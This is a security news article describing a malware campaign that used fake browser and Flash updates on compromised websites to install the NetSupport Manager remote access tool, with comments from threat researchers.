Cyber-criminals used compromised websites to distribute malware under the guise of updates to popular applications, including Adobe Flash, Chrome and FireFox. Information security training researchers find out that in several cases, the legitimate remote access tool (RAT) of NetSupport Manager was distributed through updates.
NetSupport Manager is a legitimate, commercially available tool used by administrators to remotely access users’ computers. But hackers have taken advantage of this tool by installing it on victim’s computers.
This function collects various system information; such as architecture, computer name, user name, processor, OS, domain, manufacturer, model, BIOS version, security solutions, MAC address, keyboard, display controller configuration, and process list. In response, the server sends a function called step3 and a file called Update.js, which in turn loads and executes the final malicious payload.
The malware also uses PowerShell commands to download files from the server, including a standalone 7zip executable file that contains a remote access tool, and a batch script for installing the NetSupport client on the system.
The script can also disable Windows error reporting and application compatibility, adding the executable file to the list of allowed programs, downloading the shortcut to the Startup folder, hiding specific files, deleting artifacts.
By using NetSupport Manager, attackers can gain remote access to hacked systems, launch applications, receive location data, and steal system information.
“RATs are widely used for legitimate purposes, often by system administrators. However, since they are legitimate applications and readily available, malware authors can easily abuse them and sometimes can avoid user suspicion as well,” said Sudhanshu Dubey, information security training researcher at Fireeye.
“We recently spoke about the UDPoS malware, a family which is consistently disguised as a software update to important system and administration software. Overall, the technique is probably about halfway up the clever spectrum: it’s been around for quite some time and it couldn’t be described as particularly innovative in modern times, but end-users are very used to seeing and accepting prompts for software updates to the point where many experience ‘update request fatigue’. Malicious actors don’t need to innovate or change lure techniques when their existing tricks continue to be effective,” he said.
Barry Shteiman, director of Threat Research at Exabeam, told that organisations need to be able to detect unusual activity from valid machines and users, which is why behavioural analytics has grown so quickly over the last couple of years.